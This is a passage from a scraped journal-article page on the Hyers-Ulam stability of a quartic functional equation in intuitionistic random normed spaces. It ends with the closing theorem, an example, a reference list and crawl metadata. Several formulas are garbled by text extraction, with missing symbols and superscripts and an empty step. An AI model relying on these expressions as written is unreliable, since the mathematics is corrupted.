Let f : XY be a mapping such that\n\n$P μ , ν ( 16 f ( x + 4 y ) + f ( 4 x − y ) − 306 [ 9 f ( x + y 3 ) + f ( x + 2 y ) ] − 136 f ( x − y ) + 1394 f ( x + y ) − 425 f ( y ) + 1530 f ( x ) , t ) ≥ L * P ′ μ ′ , ν ′ ( x + y , t )$\n\nfor all t > 0 in which\n\n$lim n → ∞ T i = 1 ∞ ( P μ ′ , ν ′ ′ ( x , 4 4 n + 3 i + 3 t ) ) = 1 L *$\n\nfor all x, y X. Then there exists a unique quartic mapping Q : XY such that\n\n$P μ , ν ( f ( x ) - Q ( x ) , t ) ≥ L * T i = 1 ∞ ( P μ ′ , ν ′ ′ ( x , 4 3 i + 3 t ) ) .$\n\nNow, we give an example to illustrate the main result of Theorem 7.1 as follows.\n\nExample 7.3. Let (X, ||.||) be a Banach algebra, $( X , P μ , ν , M )$ an IRN-space in which\n\n$P μ , ν ( x , t ) = t t + | | x | | , | | x | | t + | | x | |$\n\nand let $( Y , P μ , ν , M )$ be a complete IRN-space for all x X. Define f : XX by f (x) = x4 + x0, where x0 is a unit vector in X. A straightforward computation shows that\n\n$P μ , ν ( 16 f ( x + 4 y ) + f ( 4 x − y ) − 306 [ 9 f ( x + y 3 ) + f ( x + 2 y ) ] − 136 f ( x − y ) + 1394 f ( x + y ) − 425 f ( y ) + 1530 f ( x ) , t ) ≥ L * P μ , ν ( x + y , t ) , ∀ t > 0 .$\n\nAlso\n\nTherefore, all the conditions of 7.1 hold and so there exists a unique quartic mapping Q : XY such that\n\n$P μ , ν ( f ( x ) - Q ( x ) , t ) ≥ L * P μ , ν ( x , 4 6 t ) .$\n\n## References\n\n1. 1.\n\nUlam SM: Problems in Modern Mathematics. In Science Editions. Volume Chapter VI. Wiley, New York; 1964.\n\n2. 2.\n\nHyers DH: On the stability of the linear functional equation. Proc Natl Acad Sci USA 1941, 27: 222–224. 10.1073/pnas.27.4.222\n\n3. 3.\n\nAoki T: On the stability of the linear transformation in Banach spaces. J Math Soc Jpn 1950, 2: 64–66. 10.2969/jmsj/00210064\n\n4. 4.\n\nRassias ThM: On the stability of the linear mapping in Banach spaces. Proc Am Math Soc 1978, 72: 297–300. 10.1090/S0002-9939-1978-0507327-1\n\n5. 5.\n\nBaak C, Moslehian MS: On the stability of J *-homomorphisms. Nonlinear Anal TMA 2005, 63: 42–48. 10.1016/j.na.2005.04.004\n\n6. 6.\n\nChudziak J, Tabor J: Generalized Pexider equation on a restricted domain. J Math Psychol 2008, 52: 389–392. 10.1016/j.jmp.2008.04.002\n\n7. 7.\n\nCzerwik S: Functional Equations and Inequalities in Several Variables. World Scientific, River Edge, NJ 2002.\n\n8. 8.\n\nEshaghi Gordji M, Rassias JM, Savakohi MB: Approximation of the quadratic and cubic functional equations in RN-spaces. Eur J Pure Appl Math 2009,2(4):494–507.\n\n9. 9.\n\nHyers DH, Isac G, Rassias ThM: Stability of Functional Equations in Several Variables. Birkhäuser, Basel 1998.\n\n10. 10.\n\nJung S: Hyers-Ulam-Rassias Stability of Functional Equations in Mathematical Analysis. Hadronic Press, Palm Harbor; 2001.\n\n11. 11.\n\nRassias JM: On approximation of approximately linear mappings by linear mappings. J Funct Anal 1982, 46: 126–130. 10.1016/0022-1236(82)90048-9\n\n12. 12.\n\nRassias JM: On approximation of approximately linear mappings by linear mappings. Bull Sci Math 1984, 108: 445–446.\n\n13. 13.\n\nRassias JM: Solution of a problem of Ulam. J Approx Theory 1989, 57: 268–273. 10.1016/0021-9045(89)90041-5\n\n14. 14.\n\nRassias JM: Solution of the Ulam stability problem for the quartic mapping. Glasnik Matematicki 1999,34(54):243–252.\n\n15. 15.\n\nRassias ThM: On the stability of functional equations and a problem of Ulam. Acta Appl Math 2000, 62: 23–130. 10.1023/A:1006499223572\n\n16. 16.\n\nRassias ThM: Functional Equations, Inequalities and Applications. Kluwer Academic Publishers, Dordrecht; 2003.\n\n17. 
17.\n\nRavi K, Rassias JM, Arunkumar M, Kodandan R: Stability of a generalized mixed type additive, quadratic, cubic and quartic functional equation. JIPAM 2009,10(4):29. Article ID 114\n\n18. 18.\n\nAlsina C: On the stability of a functional equation arising in probabilistic normed spaces. General Inequalities, Oberwolfach 1986, 5: 263–271. Birkhäuser, Basel (1987)\n\n19. 19.\n\nChang SS, Rassias JM, Saadati R: The stability of the cubic functional equation in intuitionistic random normed spaces. Appl Math Mech 2010, 31: 21–26. 10.1007/s10483-010-0103-6\n\n20. 20.\n\nMirmostafaee M, Mirzavaziri M, Moslehian MS: Fuzzy stability of the Jensen functional equation. Fuzzy Set Syst 2008, 159: 730–738. 10.1016/j.fss.2007.07.011\n\n21. 21.\n\nMirzavaziri M, Moslehian MS: A fixed point approach to stability of a quadratic equation. Bull Braz Math Soc 2006, 37: 361–376. 10.1007/s00574-006-0016-z\n\n22. 22.\n\nMiheţ D, Radu V: On the stability of the additive Cauchy functional equation in random normed spaces. J Math Anal Appl 2008, 343: 567–572.\n\n23. 23.\n\nMiheţ D: The probabilistic stability for a functional equation in a single variable. Acta Math Hungar 2009, 123: 249–256. 10.1007/s10474-008-8101-y\n\n24. 24.\n\nMiheţ D: The fixed point method for fuzzy stability of the Jensen functional equation. Fuzzy Set Syst 2009, 160: 1663–1667. 10.1016/j.fss.2008.06.014\n\n25. 25.\n\nMiheţ D, Saadati R, Vaezpour SM: The stability of the quartic functional equation in random normed spaces. Acta Appl Math 2010, 110: 797–803. 10.1007/s10440-009-9476-7\n\n26. 26.\n\nMiheţ D, Saadati R, Vaezpour SM: The stability of an additive functional equation in Menger probabilistic φ -normed spaces. Math Slovaca 2011, 61: 817–826. 10.2478/s12175-011-0049-7\n\n27. 27.\n\nBaktash E, Cho Y, Jalili M, Saadati R, Vaezpour SM: On the stability of cubic mappings and quadratic mappings in random normed spaces. J Inequal Appl 2008, 2008: Article ID 902187.\n\n28. 28.\n\nEshaghi Gordji M, Zolfaghari S, Rassias JM, Savadkouhi MB: Solution and stability of a mixed type cubic and quartic functional equation in quasi-Banach spaces. Abst Appl Anal 2009, 2009: 14. Article ID 417473\n\n29. 29.\n\nSaadati R, Vaezpour SM, Cho Y: A note on the \"On the stability of cubic mappings and quadratic mappings in random normed spaces\". J Inequal Appl 2009, 2009: Article ID 214530.\n\n30. 30.\n\nMohamadi M, Cho Y, Park C, Vetro P, Saadati R: Random stability of an additive-quadratic-quartic functional equation. J Inequal Appl 2010, 2010: 18. Article ID 754210\n\n31. 31.\n\nHadžić O, Pap E: Fixed Point Theory in PM-Spaces. Kluwer Academic, Dordrecht; 2001.\n\n32. 32.\n\nHadžić O, Pap E, Budincević M: Countable extension of triangular norms and their applications to the fixed point theory in probabilistic metric spaces. Kybernetica 2002, 38: 363–381.\n\n33. 33.\n\nŠerstnev AN: On the notion of a random normed space. Dokl Akad Nauk SSSR 1963, 149: 280–283. (in Russian)\n\n34. 34.\n\nSchweizer B, Sklar A: Probabilistic Metric Spaces. Elsevier, North Holand; 1983.\n\n35. 35.\n\nHensel K: Uber eine neue Begrundung der Theorie der algebraischen Zahlen. Jahres Deutsch Math Verein 1897, 6: 83–88.\n\n36. 36.\n\nMirmostafaee M, Moslehian MS: Fuzzy stability of additive mappings in non-Archimedean Fuzzy normed spaces. Fuzzy Set Syst 2009, 160: 1643–1652. 10.1016/j.fss.2008.10.011\n\n37. 37.\n\nLuxemburg WAJ: On the convergence of successive approximations in the theory of ordinary differential equations, II. Nederl. Akad. Wetensch. Proc. Ser. A 61 = Indag. 
Math 1958, 20: 540–546.\n\n38. 38.\n\nJung C: On generalized complete metric spaces. Bull Am Math Soc 1969, 75: 113–116. 10.1090/S0002-9904-1969-12165-8\n\n39. 39.\n\nMiheţ D: The stability of the additive Cauchy functional equation in non-Archimedean fuzzy normed spaces. Fuzzy Set Syst 2010, 161: 2206–2212. 10.1016/j.fss.2010.02.010\n\n40. 40.\n\nChang SS, Cho Y, Kang Y: Nonlinear Operator Theory in Probabilistic Metric Spaces. Nova Science Publishers Inc., New York; 2001.\n\n41. 41.\n\nKutukcu S, Tuna A, Yakut AT: Generalized contraction mapping principle in intuitionistic Menger spaces and application to differential equations. Appl Math Mech 2007, 28: 799–809. 10.1007/s10483-007-0610-z\n\n42. 42.\n\nSaadati R, Park J: On the intuitionistic fuzzy topological spaces. Chaos Soliton Fract 2006, 27: 331–344. 10.1016/j.chaos.2005.03.019\n\n43. 43.\n\nAtanassov KT: Intuitionistic fuzzy sets. Fuzzy Set Syst 1986, 20: 87–96. 10.1016/S0165-0114(86)80034-3\n\n44. 44.\n\nDeschrijver G, Kerre EE: On the relationship between some extensions of fuzzy set theory. Fuzzy Set Syst 2003, 23: 227–235.\n\nDownload references\n\n## Author information\n\nAuthors\n\n### Corresponding author\n\nCorrespondence to Reza Saadati.\n\n## Additional information\n\n### Authors' contributions\n\nAll authors carried out the proof. All authors conceived of the study, and participated in its design and coordination. All authors read and approved the final manuscript.\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n## Rights and permissions\n\nReprints and Permissions\n\n## About this article\n\n### Cite this article\n\nRassias, J.M., Saadati, R., Sadeghi, G. et al. On nonlinear stability in various random normed spaces. J Inequal Appl 2011, 62 (2011). https://doi.org/10.1186/1029-242X-2011-62\n\nDownload citation\n\n• Received:\n\n• Accepted:\n\n• Published:\n\n### Keywords\n\n• generalized Hyers-Ulam stability\n• quartic functional equation\n• random normed space\n• intuitionistic random normed space", null, "" ]
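The t-norm machinery used throughout the paper is easy to experiment with numerically. The sketch below is not part of the article and the helper names are mine; it spot-checks the four t-norm axioms from the preliminaries — commutativity, associativity, boundary condition and monotonicity — for the basic examples T_M, T_P, the Lukasiewicz t-norm T_L and the drastic t-norm T_D on a grid of points in [0, 1].

```python
import itertools
import numpy as np

def t_min(a, b):      return min(a, b)                                  # T_M
def t_prod(a, b):     return a * b                                      # T_P
def t_luk(a, b):      return max(a + b - 1.0, 0.0)                      # T_L (Lukasiewicz)
def t_drastic(a, b):  return min(a, b) if max(a, b) == 1.0 else 0.0     # T_D

grid = np.linspace(0.0, 1.0, 11)
eps = 1e-12

for name, T in [("T_M", t_min), ("T_P", t_prod), ("T_L", t_luk), ("T_D", t_drastic)]:
    ok = True
    for a, b, c in itertools.product(grid, repeat=3):
        ok &= abs(T(a, b) - T(b, a)) < eps               # (i)   commutativity
        ok &= abs(T(a, T(b, c)) - T(T(a, b), c)) < eps   # (ii)  associativity
        ok &= abs(T(a, 1.0) - a) < eps                   # (iii) boundary condition
        if b <= c:
            ok &= T(a, b) <= T(a, c) + eps               # (iv)  monotonicity
    print(name, "satisfies axioms (i)-(iv) on the grid:", ok)
```

The same loop also confirms the pointwise ordering T_D ≤ T_L ≤ T_P ≤ T_M, which is a standard fact about these four examples.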
[ null, "https://journalofinequalitiesandapplications.springeropen.com/track/article/10.1186/1029-242X-2011-62", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8160967,"math_prob":0.9997429,"size":25498,"snap":"2021-04-2021-17","text_gpt3_token_len":8148,"char_repetition_ratio":0.1541147,"word_repetition_ratio":0.13858695,"special_character_ratio":0.33084947,"punctuation_ratio":0.1773617,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994564,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-22T00:29:47Z\",\"WARC-Record-ID\":\"<urn:uuid:a1bbb793-8630-4ac7-b2b2-14da80c1537f>\",\"Content-Length\":\"989522\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:92a301ff-d2c7-420f-9347-51897a1926c9>\",\"WARC-Concurrent-To\":\"<urn:uuid:b799a14f-be55-4be5-994f-373a360aef89>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://journalofinequalitiesandapplications.springeropen.com/articles/10.1186/1029-242X-2011-62\",\"WARC-Payload-Digest\":\"sha1:FT4GOKB3TXNSWHK6A44X46DNU5X4OMKJ\",\"WARC-Block-Digest\":\"sha1:6J3PRF3IFIEUE4VJMFHSWLY2M6DOEHK4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039554437.90_warc_CC-MAIN-20210421222632-20210422012632-00450.warc.gz\"}"}
https://answers.everydaycalculation.com/compare-fractions/24-4-and-24-35
[ "# Answers\n\nSolutions by everydaycalculation.com\n\n## Compare 24/4 and 24/35\n\n1st number: 6 0/4, 2nd number: 24/35\n\n24/4 is greater than 24/35\n\n#### Steps for comparing fractions\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 4 and 35 is 140\n\nNext, find the equivalent fraction of both fractional numbers with denominator 140\n2. For the 1st fraction, since 4 × 35 = 140,\n24/4 = 24 × 35/4 × 35 = 840/140\n3. Likewise, for the 2nd fraction, since 35 × 4 = 140,\n24/35 = 24 × 4/35 × 4 = 96/140\n4. Since the denominators are now the same, the fraction with the bigger numerator is the greater fraction\n5. 840/140 > 96/140 or 24/4 > 24/35\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:\nAndroid and iPhone/ iPad\n\n#### Compare Fractions Calculator\n\nand\n\n© everydaycalculation.com" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84789604,"math_prob":0.98777664,"size":890,"snap":"2021-21-2021-25","text_gpt3_token_len":326,"char_repetition_ratio":0.2054176,"word_repetition_ratio":0.0,"special_character_ratio":0.4494382,"punctuation_ratio":0.07070707,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99101144,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-13T00:06:45Z\",\"WARC-Record-ID\":\"<urn:uuid:e6b0a6ca-56b3-4a0b-8b1d-3397cf6dc05c>\",\"Content-Length\":\"7810\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:17506619-3a8c-465d-910e-0765921e1f27>\",\"WARC-Concurrent-To\":\"<urn:uuid:85f84b31-5b05-4678-a32e-d48f471b7099>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/compare-fractions/24-4-and-24-35\",\"WARC-Payload-Digest\":\"sha1:SQN7DYAMOTACAQ2ZEXAGGXIGURIIPID7\",\"WARC-Block-Digest\":\"sha1:VY7Y7OV6CUYCJVQCTMSXLA4L6PHOWONX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487586465.3_warc_CC-MAIN-20210612222407-20210613012407-00022.warc.gz\"}"}
https://math.stackexchange.com/questions/2345874/int-texte-ax2-texterf-leftbx-c-right-dx/2348230
[ "# $\\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx$\n\nI'm hoping to find a closed expression for the following integral. $$\\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx$$ One can find a solution for a family of products between exponentials and error functions. None of which apparently have the offset term in the error function.\n\nI have tried tackling the problem with two approaches.\n\nApproach #1: Expanding the error function hoping to find nice cancelations leading to the maclerin series of some known elementary function. Following a similar approach by Alex:\n\n\\begin{aligned} \\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx &= \\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\int(bx+c)^{2n +1} \\text{e}^{-ax^2} dx \\\\ & = \\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\int \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} (bx)^{k} c^{2n+1-k} \\text{e}^{-ax^2} dx \\\\ & = \\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} c^{2n+1-k} b^k\\int x^{k} \\text{e}^{-ax^2} dx = \\\\ &\\frac{2}{\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} c^{2n+1-k} b^k \\left(-\\frac{1}{2}a^{-\\frac{k+1}{2}} \\Gamma\\left(\\frac{k+1}{2},ax^2\\right)\\right) \\\\ &= -\\frac{1}{\\sqrt{a}\\sqrt{\\pi}} \\sum_{n=0}^\\infty \\frac{(-1)^n }{n!(2n+1)} \\sum_{k=0}^{2n+1} {{2n+1}\\choose{k}} c^{2n+1-k} \\left(\\frac{b}{\\sqrt{a}}\\right)^k \\Gamma\\left(\\frac{k+1}{2},ax^2\\right) \\end{aligned}\n\nI have used the binomial expansion for $(bx + c)^{2n+1}$ and that $\\int x^k \\text{e}^{-ax^2}dx = -\\frac{1}{2}a^{-\\frac{k+1}{2}} \\Gamma\\left(\\frac{k+1}{2} ,ax^2\\right)$ where $\\Gamma(,)$ is the incomplete gamma function. Too bad, the last term can not be combined again in the form of a binomial expansion.\n\nApproach #2: Instead of expanding the error function, I tried writing it in terms of the cumulative CDF function (Q-Function) as $\\text{erf}(x) = 2\\Phi(\\sqrt{2} x) - 1$. However, the following can be shown to be true using integration under the integral sign with respect to $\\mu$. [Section 2.4, and ref] $$\\frac{1}{\\sqrt{2 \\pi} \\sigma}\\int_{-\\infty}^{\\infty}\\Phi(\\lambda x) \\text{e}^{-\\frac{(x - \\mu)^2}{2 \\sigma^2}}dx =\\Phi\\left(\\frac{\\lambda \\mu}{\\sqrt{1+\\lambda^2\\sigma^2}}\\right)$$\n\nNow with some change of variables and rescaling we are instead interested in the following integral: $$\\int\\text{e}^{a_1 x^2 + a_2 x} \\text{erf}\\left(x\\right) dx = \\underbrace{2\\int \\text{e}^{a_1 x^2 + a_2 x} \\Phi(\\sqrt{2} x) dx}_{I} - \\underbrace{\\int \\text{e}^{a_1 x^2 + a_2 x} dx}_{easy}$$\n\nHowever, what I'm not certain of if I can use the trick of integration under integral sign for the indefinite integral labeled I. Can I, with some change of variables, use the result deduced for the definite integral case as $\\Phi\\left(\\frac{\\lambda \\mu}{\\sqrt{1+\\lambda^2\\sigma^2}}\\right) + C(x)$?\n\nEDIT: It seems that the problem in had has no closed form solution as pointed out by user90369. Also, user90369 has pointed out that the following more general case have no closed form solution. $$\\int x^{2n} \\text{e}^{-ax^2} \\text{erf}(bx+c) dx$$ I was wondering, if there are any good approximations that I can use here. By good, I mean refer to an error that is $|e(x)| \\leq 10^{-5} \\forall x$. For starter, I was looking at the high accuracy approximations in here for the erf function. 
Unfortunately, none of these approximations result into an integral that inherits a closed form solution. I, however, have the following suggested approach with the use of the following identity. $$\\text{erf}(bx+c) = 2 \\Phi\\left(\\sqrt{2} (bx+c)\\right) - 1$$ This results into the following: \\begin{aligned} \\int\\text{e}^{-ax^2 } \\text{erf}\\left(bx + c\\right) dx = 2\\int \\text{e}^{-ax^2 } \\Phi\\left(\\sqrt{2} (bx+c)\\right) dx - \\int \\text{e}^{-ax^2 } dx \\end{aligned} Now, one can use the approximation of the $\\Phi$-function that results from applying Chernof's bound. Link $$\\Phi(x) \\approx \\frac{1}{12} \\text{e}^{-\\frac{x^2}{2}} + \\frac{1}{4} \\text{e}^{-\\frac{2}{3} x^2}$$ I'd like to take a suggestion of how good is this approximation after computing the integral. Or maybe if there are other better approximations/recommendations that result into a manageable integral afterwards.\n\n• @user90369 Thanks. Would you care suggesting an approximation? For instance, all the approximations provided here people.math.sfu.ca/~cbm/aands/page_299.htm are not useful in solving the resulting integral. I was considering approximating the $\\Phi$ function with an exponential from Chernof's bound. en.wikipedia.org/wiki/Q-function – Adel Bibi Jul 5 '17 at 12:17\n• @user90369 Also, there appears to be some hope for the definite integral case. math.stackexchange.com/questions/2236490/… – Adel Bibi Jul 5 '17 at 12:27\n• There is a very big difference between $\\int$ and $\\int_{-\\infty}^\\infty$ . Maybe someone can give you an useful answer if you decide where your focus is here. – user90369 Jul 5 '17 at 12:38\n• If you use the method in math.stackexchange.com/questions/2236490/… (the link you've mentioned) you will get a formula for $\\int\\limits_{-\\infty}^\\infty e^{-ax^2} \\text{erf}(bx+c)dx$ . One must substitute $x$ by $(x-c)/b$ and then do the derivation of the integral with respect to $c$ . – user90369 Jul 5 '17 at 15:45\n• You haven't defined what a \"good\" approximation is here (for you) but anyway you can make numerical tests with some values and see whether they meet your expectations. To approximate $Q$ and therefore at the end $\\,\\text{erf} \\,$ by sums of $e^{-a(x+b)^2}$ is of course a good idea. – user90369 Jul 5 '17 at 16:07\n\nI don't know if this helps for an useful approximation but maybe it's better than nothing. 
:-)\n\nFor $$\\,v\\in\\mathbb{N}_0\\,$$ we get\n\n$$\\int x^{2v+1}e^{-ax^2}dx= -\\frac{v!e^{-ax^2}}{2a^{v+1}}\\sum\\limits_{j=0}^v\\frac{(ax^2)^j}{j!} + C_{2v+1}$$\n\nand\n\n$$\\int x^{2v}e^{-ax^2}dx= \\frac{(2v)!\\sqrt{a\\pi}\\text{erf}(\\sqrt{a}x)}{2^v v!(2a)^{v+1}}-e^{-ax^2}\\sum\\limits_{j=0}^{v-1}\\frac{(v-j)!(2v)!x^{2v-2j-1}}{2^j v!(2v-2j)!(2a)^{j+1}} + C_{2v}$$\n\nand it follows:\n\n\\begin{align} & \\hphantom{ {}={}} \\int e^{-ax^2} \\text{erf}(bx+c)dx \\\\ &= \\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\int (bx+c)^{2k+1} e^{-ax^2} dx \\\\ &= \\sum\\limits_{k=0}^\\infty \\frac{(-1)^k}{k!(2k+1)}\\sum_{v=0}^{2k+1}\\binom {2k+1} v b^v c^{2k+1-v}\\int x^v e^{-ax^2} dx \\\\ &= \\sum\\limits_{k=0}^\\infty \\frac{(-1)^k}{k!(2k+1)}\\sum_{v=0}^k\\binom {2k+1} {2v} b^{2v} c^{2k+1-2v}\\int x^{2v} e^{-ax^2} dx \\\\ &\\hspace{5mm} +\\sum\\limits_{k=0}^\\infty \\frac{(-1)^k}{k!(2k+1)}\\sum_{v=0}^k\\binom {2k+1} {2v+1} b^{2v+1} c^{2k-2v}\\int x^{2v+1} e^{-ax^2} dx \\\\ &= \\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)} \\sum\\limits_{v=0}^k \\binom {2k+1} {2v} b^{2v}c^{2k-2v+1} \\\\ &\\hspace{3cm} \\cdot \\left( \\frac{(2v)!\\sqrt{a\\pi}\\text{erf}(\\sqrt{a}x)}{2^v v!(2a)^{v+1}}-e^{-ax^2}\\sum\\limits_{j=0}^{v-1}\\frac{(v-j)!(2v)!x^{2v-2j-1}}{2^j v!(2v-2j)!(2a)^{j+1}} \\right) \\\\ &\\hspace{5mm} - \\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)} \\sum\\limits_{v=0}^k \\binom {2k+1} {2v+1} b^{2v+1}c^{2k-2v} \\frac{v!e^{-ax^2}}{2a^{v+1}}\\sum\\limits_{j=0}^v\\frac{(ax^2)^j}{j!} + C \\\\ &= \\sqrt{a\\pi}\\text{erf}(\\sqrt{a}x)\\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\sum\\limits_{v=0}^k \\binom {2k+1} {2v} \\frac{(2v)!b^{2v}c^{2k-2v+1}}{2^v v!(2a)^{v+1}} \\\\ &\\hspace{5mm} -e^{-ax^2}\\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\sum\\limits_{v=0}^k \\binom {2k+1} {2v} b^{2v}c^{2k-2v+1}\\sum\\limits_{j=0}^{v-1}\\frac{(v-j)!(2v)!x^{2v-2j-1}}{2^j v!(2v-2j)!(2a)^{j+1}} \\\\ &\\hspace{5mm} -e^{-ax^2}\\sum\\limits_{k=0}^\\infty\\frac{(-1)^k}{k!(2k+1)}\\sum\\limits_{v=0}^k \\binom {2k+1} {2v+1} b^{2v+1}c^{2k-2v} \\frac{v!}{2a^{v+1}}\\sum\\limits_{j=0}^v\\frac{(ax^2)^j}{j!} + C \\end{align}\n\n• Thanks for the approach. Not sure really if that helps alot. I was looking into some more simpler forms as the result of the required integral will be later integrated too over some other parameter. I have tried the approximation mentioned in the OP; however, this approximation is not continuous. Resulting in a disjunction in the final solution that is broken into pieces depending on the region of integration. This is because $\\Phi(x) \\approx \\frac{1}{2} e^{-\\frac{1}{2}x^2} \\forall x \\ge 0$. – Adel Bibi Jul 11 '17 at 8:23\n• @AdelBibi : The series is the exact result. For simplification it's necessary to specify additional decision criteria, e.g. the value ranges ​​of the parameters. – user90369 Jul 11 '17 at 10:10\n• I have looked at it more now. I think that should be a good approximation. However, may you detail the integral. Also, I don't quite see where did the error function disappear after the second line. Also, are there a missing equal signs from third and forth row? Could you add some details to it so that I can officially accept it as an answer? – Adel Bibi Jul 12 '17 at 9:23\n• @AdelBibi: Sorry, yes, you are right. I have add some steps. --- The error function doesn't disappear, it's a part of the solution. --- Missing equal signs ? No, but the terms and sums are partly too long for one line. (Maybe your screen display is different to mine ? 
Or do I misunderstand you ?) – user90369 Jul 12 '17 at 9:53\n• @AdelBibi : You are welcome (and sorry for the inconvenience because of a too short explanation first). :-) – user90369 Jul 13 '17 at 8:45" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7981438,"math_prob":0.9996611,"size":4204,"snap":"2019-35-2019-39","text_gpt3_token_len":1498,"char_repetition_ratio":0.14404762,"word_repetition_ratio":0.05109489,"special_character_ratio":0.36869648,"punctuation_ratio":0.06088993,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994814,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-19T09:21:47Z\",\"WARC-Record-ID\":\"<urn:uuid:a35d15b7-b420-4635-b394-7a079fd11bc3>\",\"Content-Length\":\"157887\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c2af7ac5-c54d-444c-b25a-42afe88f6fc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:c3000935-0800-449d-a7d5-e6a2be949aae>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/2345874/int-texte-ax2-texterf-leftbx-c-right-dx/2348230\",\"WARC-Payload-Digest\":\"sha1:CL3WIIMRTHRVMUZASU5IYMZQYKMZU6O4\",\"WARC-Block-Digest\":\"sha1:2SNCV5KER5542MEYELM5QK2MPIHB3YED\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573465.18_warc_CC-MAIN-20190919081032-20190919103032-00367.warc.gz\"}"}
http://jalape.no/math/tknottxt.htm
[ "### Threefoil knot\n\nThe standard threefoil knot. This is a \"sausage\" mode rendering. To acheive this in PoV was somewhat hairy. Look at code below.\n\nThis is just clipped from a POV file I did to draw a knot\n\n``` //various constants\n\nuumin = 0,uumax = 4*pi\n\nvvmin = 0,vvmax = 2*pi\n\na=1, b=0.3, c=0.5, d=0.3\n\n//preliminary calculations\n\nr=a+b*cos(1.5*uu)\n\nxx=r*cos(uu)\n\nyy=r*sin(uu)\n\nzz=c*sin(1.5*uu)\n\ndx=-1.5*b*sin(1.5*uu)*cos(uu)-(a+b*cos(1.5*uu))*sin(uu)\n\ndy=-1.5*b*sin(1.5*uu)*sin(uu)+(a+b*cos(1.5*uu))*cos(uu)\n\ndz=1.5*c*cos(1.5*uu) //Derivatives\n\nqn=vnormalize() //Vector operatons\n\nqvn=vnormalize()\n\nww=vcross(qn,qvn)\n\n//points and normals\n\nx1=xx+d*(qvn.x*cos(vv)+ww.x*sin(vv)) //Calculate the\n\ny1=yy+d*(qvn.y*cos(vv)+ww.y*sin(vv)) //points. ww.x is the\n\nz1=zz+d*ww.z*sin(vv) //x value of ww vector\n\nnx1=qvn.x*cos(vv)+ww.x*sin(vv) //Normals needed to\n\nny1=qvn.y*cos(vv)+ww.y*sin(vv) //make smooth triangles\n\nnz1=ww.z*sin(vv)\n\n```\n\nHere is the PoV3-source I used" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54988045,"math_prob":0.99919957,"size":789,"snap":"2019-13-2019-22","text_gpt3_token_len":348,"char_repetition_ratio":0.16050956,"word_repetition_ratio":0.0,"special_character_ratio":0.38403043,"punctuation_ratio":0.13656388,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999166,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T03:09:51Z\",\"WARC-Record-ID\":\"<urn:uuid:ce67d37f-78af-4343-9211-45f2d5ca97fe>\",\"Content-Length\":\"1956\",\"Content-Type\":\"application/http; 